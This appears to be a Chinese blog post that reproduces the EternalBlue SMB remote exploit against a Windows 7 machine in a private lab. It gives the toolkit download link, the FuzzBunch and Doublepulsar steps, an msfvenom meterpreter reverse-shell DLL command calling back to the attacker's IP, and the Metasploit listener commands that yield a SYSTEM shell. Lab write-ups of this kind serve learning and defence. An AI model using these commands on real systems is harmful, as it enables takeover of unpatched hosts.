0x01  环境搭建

  1. win2003 攻击机,ip:192.168.0.28
  2. kali 攻击机,ip:192.168.0.27
  3. win7 靶机,ip:192.168.0.14;netstat -an 查看端口开发情况,确保445端口开启
  4. 另外:win2003攻击机需要有python环境,安装python-2.6.6.msi,pywin32-221.win32-py2.6.exe,安装过程不再赘述,安装完成修改系统变量即可。
  5. 方程式ETERNALBLUE 下载地址:https://codeload.github.com/misterch0c/shadowbroker/zip/master;下载解压后将其中windows目录的所有文件拷贝之win2003系统中。
  6. 在该windows目录下建立一个文件夹为:listeningposts;与fb.py文件中的一致

0x02  测试过程

  1. 进入windows目录。执行python fb.py,设置目标IP与本机IP,重定向选择No;这里由于我的虚拟机没有D盘,所以修改logs文件目录到C盘。
  2. 根据提示,输入0创建一个新的项目,项目名为test
  3. 接下来使用use Eternalblue,一路回车:
  4. 这里要注意,根据提示选项,这里选择1,然后继续一路回车
  5. 在kali系统中,利用msf生成一个dll劫持文件,并将s.dll文件拷贝到windows2003的C盘目录下:

    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.27 LPORT=5555 -f dll > /opt/s.dll

  6. 在msf下开启msfpaylod监听:

    use exploit/multi/handler

    set lhost 192.168.0.27

    set lport 5555

    set PAYLOAD windows/x64/meterpreter/reverse_tcp

    exploit

  7. 接下来继续在windows2003上执行use Doublepulsar
  8. 根据提示选择对应系统,运行dll文件,设置dll文件路径
  9. 最后在MSF中可以看到,成功反弹shell,拿到系统权限。

0x03  参考文档

  • TOOLS文章:http://mp.weixin.qq.com/s?__biz=MjM5MDkwNjA2Nw==&mid=2650374058&idx=1&sn=2ac09acae4fe70ca80446c3385feb90c&chksm=beb07c1689c7f500cad4fb3f8e2e76f31220b569ef3617e440dacb6cbe646958065ec9493f37&mpshare=1&scene=23&srcid=0416plWIdYQXxZ61ZUEd2foy#rd
  • 边界安全文章:http://mp.weixin.qq.com/s?__biz=MzI0MzQyNzI2OA==&mid=2247484335&idx=1&sn=b5ad15e967aa13a729ee3c5890320038&chksm=e96c7104de1bf81216500f50a62a335579916b32d7ccf8b94402922fa97bb005faceea876b52&mpshare=1&scene=23&srcid=0416ztWMmZGOSUjFbBMED29b#rd

方程式ETERNALBLUE:Windows SMB远程溢出漏洞复现笔记相关推荐

  1. MS08-067远程代码执行漏洞(CVE-2008-4250) | Windows Server服务RPC请求缓冲区溢出漏洞复现

    MS08-067远程代码执行漏洞(CVE-2008-4250) | Windows Server服务RPC请求缓冲区溢出漏洞复现 文章目录 MS08-067远程代码执行漏洞(CVE-2008-4250 ...

  2. 【漏洞复现】永恒之蓝 MS17-010 远程溢出漏洞(CVE-2017-0143)

    文章目录 声明 前言 一.漏洞原理简述 二.漏洞代码深层解析 三.实验步骤 四.漏洞补丁 总结 声明 本篇文章仅用于技术研究与技术学习,切勿用于非授权下攻击行为,切记! 前言 Windows7 存在 ...

  3. 利用MS08067远程溢出漏洞抓肉鸡

    利用MS08067远程溢出漏洞抓肉鸡 陈小兵 [antian365.com] 微软的正版验证机会出来以后没有多久,就爆出针对台湾和简体中文版本的MS08067漏洞,这个时候微软主动爆出这个号称比冲击波 ...

  4. 一步到位的 UPnP 远程溢出漏洞实战

    远程溢出***漏洞 (Remote Buffer Overflow Vulnerability) 是远程直接***被黑 电脑或服务器最典型.最常见的漏洞,原因无它,只要溢出成功并运行 ShellCod ...

  5. Windows Print Spooler CVE-2021-1675 漏洞复现

    Windows Print Spooler CVE-2021-1675 漏洞复现 Created: July 7, 2021 5:25 PM 漏洞描述 Windows Print Spooler是Wi ...

  6. Microsoft Windows SMB信息泄露漏洞

    受影响系统: Microsoft Windows Server 20H2 (Server Core Insta Microsoft Windows Server 2022 (Server Core i ...

  7. linux远程溢出,Linux netkit in.telnetd远程溢出漏洞

    Linux netkit in.telnetd远程溢出漏洞 2008-04-09 04:30:32来源:互联网 阅读 () Linux netkit in.telnetd远程溢出漏洞 发布日期:200 ...

  8. 禅道linux一键安装漏洞,禅道全版本rce漏洞复现笔记

    禅道全版本rce漏洞复现笔记 漏洞说明 禅道项目管理软件是一款国产的,基于LGPL协议,开源免费的项目管理软件,它集产品管理.项目管理.测试管理于一体,同时还包含了事务管理.组织管理等诸多功能,是中小 ...

  9. 网安学习日记-永恒之蓝MS17-010远程溢出漏洞学习(CVE-2017-0143)

    一.漏洞原理简介 MS17-010漏洞出现在Windows SMB v1中的内核态函数srv!SrvOs2FeaListToNt在处理FEA(File Extended Attributes)转换时, ...

最新文章

  1. 微软低调发布 Web 版本的 Visual Studio Code 预览
  2. 最新网络工程师考试大纲
  3. hdu 1046 完数
  4. Java - 错误: quot;java.lang.ArrayIndexOutOfBoundsException: length=1; index=1quot;
  5. ((ios开发学习笔记 十))代码实现自定义TableView
  6. Python中常用的高阶函数
  7. 怎么通过邮箱发超大附件?介绍一种基于云服务的方法
  8. WebService 之 WSDL文件 讲解
  9. Oracle 备份与还原
  10. ubuntu执行configure配置代码出现unable to guess system type报错
  11. Python pip windows安装
  12. 企业多园区统一灾备建设最佳实践
  13. c语言编程实现电脑关机,C语言让电脑关机?system函数功能够大够硬
  14. java小球落体问题_小球落体 -- 算法Java
  15. dpdk加速网络协议栈ANS用户手册
  16. 分区表的概念、优点以及类型
  17. autoexec.bat文件的所在位置
  18. ue4 获取屏幕中心点坐标
  19. 添加航班信息c语言,c语言编写航班查询代码
  20. oracle 删除后恢复,Oracle快速恢复误删数据的方法

热门文章

  1. 用format()格式化输出
  2. Ubuntu Desktop 设置中文界面
  3. 数据库技术哪家强 南大通用重磅亮相DTCC2021
  4. 10月国内电脑分辨率十强:1920*1080占比破15%
  5. java五子棋实验总结与心得_实验总结与心得体会
  6. SAP Hybris 123 官方网站视频讲解
  7. c语言实现数独游戏求解
  8. 如何删除流氓 ?搜狗网址导航
  9. vue运行报错Extra space after key template
  10. jmeter接口并发测试,多个用户登录,并提取token传入下个接口